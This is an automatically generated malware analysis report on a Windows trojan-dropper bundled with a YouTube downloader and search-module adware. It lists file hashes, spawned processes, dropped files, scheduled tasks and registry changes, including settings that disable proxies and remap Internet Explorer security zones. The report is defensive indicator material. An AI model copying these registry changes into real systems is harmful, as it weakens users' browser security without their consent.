Trojan.Win32.Swrort.3_fc40ca97e6

by malwarelabrobot on September 11th, 2015 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.bjplia (Kaspersky), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: fc40ca97e64d78f07b6a60c1304d65f8
SHA1: b842da96c3699394c3c339b20f39ee4bb3129dc7
SHA256: 0933766f85582b1e3b78f7f2a0b4bd0b3f2e3b1f28305d9960be7a68fc1fd30e
SSDeep: 24576:D0Akk3yZcqauV7mfpIx/0E43Z8MiRRlKh UM0QOJsnO:YAtCZVYyVU3ZQLZTO
Size: 1293174 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller Inc.
Created at: 2014-05-11 23:03:36
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

smu.exe:2964
smu.exe:3720
smu.exe:2764
BROWSE~2.EXE:3272
BrowserHelper.exe:1284
sc.exe:3048
sc.exe:3252
sc.exe:2908
sc.exe:364
wscript.exe:3544
net1.exe:3620
net1.exe:3204
%original file name%.exe:1736
net.exe:3184
net.exe:3552
ins_ytd.exe:2552
DC%original file name%.exe:232
DC%original file name%.exe:1276
nsB.tmp:2636
sma.exe:4012
sma.exe:4024
sma.exe:2100
sma.exe:4028
sma.exe:3160
setup.exe:2860
tcpsvcs.exe:2536
tcpsvcs.exe:2284
find.exe:2092

The Trojan injects its code into the following process(es):

YTDownloader.exe:2056

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process smu.exe:2964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\vup.tmp (94 bytes)
%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (411 bytes)

The process smu.exe:2764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\SMW_UpdateTask_Time_3835323735333432352d3437415a556c2a3223346c41.job (968 bytes)
%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (407 bytes)

The process %original file name%.exe:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (35967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\DC%original file name%.exe (380759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\D1989.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5E9581DB5A683B1D (35001 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\NK.lky (16 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\DC%original file name%.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\D1989.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5E9581DB5A683B1D (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\NK.lky (0 bytes)

The process ins_ytd.exe:2552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup.exe (1824812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup1.exe (164931 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss5.tmp (176533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\D1958.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\NK.lky (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\D1958.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup.exe (0 bytes)

The process DC%original file name%.exe:232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\Inst_Rep.job (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_9382\bxsdk32.dll (2386 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Installer\Install_8361\DC%original file name%.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_9382\ins_ytd.exe (61832 bytes)

The Trojan deletes the following file(s):

%WinDir%\Tasks\Inst_Rep.job (0 bytes)

The process DC%original file name%.exe:1276 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KAHI9BF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ABGH4T4P\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GZQNMLYL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Installer\Install_13875\DC%original file name%.exe (7726 bytes)
%WinDir%\Tasks\Inst_Rep.job (728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2N3SX0SU\desktop.ini (67 bytes)

The process setup.exe:2860 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsExec.dll (6 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (19592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp (4 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (64932 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (70495 bytes)
%Program Files%\YTDownloader\Unelevate.exe (3312 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (16424 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoD.tmp (275210 bytes)
%Program Files%\YTDownloader\Updater.exe (25824 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (13584 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (6360 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\ssleay32.dll (7192 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\libeay32.dll (33455 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20624 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\convert_ani.gif (784 bytes)
%Program Files%\YTDownloader\converter.exe (68799 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\AccDownload.dll (9320 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\ns16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\AccDownload.dll (0 bytes)

The process tcpsvcs.exe:2536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\AccD.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsProcess.dll (4 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso8.tmp (244481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\System.dll (11 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsExec.dll (6 bytes)
%WinDir%\Tasks\SMWPUpd.job (2154 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\AccD.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsExec.dll (0 bytes)

Registry activity

The process smu.exe:2964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Ult" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "82 45 47 F5 93 FC 54 F3 F7 56 15 B0 8A 13 5C DB"
"Rlt" = "Type: REG_QWORD, Length: 8"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "B6 80 93 46 AF CE C7 DB C2 AE 60 AB E4 73 47 F2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 96 0B FD 60 57 FC D6 9C 93 E0 F3 66 AF BA 89"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Ubl" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process smu.exe:3720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 FF 3C A9 0B B9 6C E9 E2 AF E1 94 16 3F 13 3D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process smu.exe:2764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Spt" = "3C F9 E5 B2 A3 B3 F5 C9 40 A6 C4 04 C0 0E 56 1B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "48 88 03 74 29 F5 E5 8D 0C B9 39 FB A6 93 06 6D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKLM\SOFTWARE\Wow6432Node\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "80 46 55 E5 90 D4 4A C0 31 0A 29 D6 59 11 73 09"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 28 2B 81 19 E8 9A FF 4F 42 C4 ED A5 37 ED 10"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BROWSE~2.EXE:3272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 C0 60 0C 64 F6 C8 71 CD FC DD F2 51 52 75 04"

The process BrowserHelper.exe:1284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 47 77 72 D4 3F A9 A5 44 F9 4B EE E9 6C 71 26"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process sc.exe:3048 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 DD 3C 0E 24 F9 59 5D AF 1A 08 7C 6F 41 A4 09"

The process sc.exe:3252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 FD 54 7F F9 0B DA F7 A7 63 7E 00 1F 9D BB 12"

The process sc.exe:2908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 8F 10 31 38 A2 83 10 9F 04 4B 09 50 BF 1F C4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process sc.exe:364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 E2 C4 42 7B D2 D0 46 E2 8C 66 0C D0 5C E1 25"

The process wscript.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 EE BF 36 D8 1D 76 77 C9 5A 41 94 C6 1C 1B 0D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Common Files\Goobzo\GBUpdatePlus]
"smu.exe" = "Search Module Plus Update Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process net1.exe:3620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 67 BD 23 40 D3 FE CD F7 36 C0 99 39 92 FC 81"

The process net1.exe:3204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 0E BB D1 A3 77 29 72 76 94 FE CC E2 6D 55 EE"

The process %original file name%.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 2B 67 80 63 54 E4 B4 11 12 53 FB 55 9B B3 C5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\DC%original file name%.exe,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

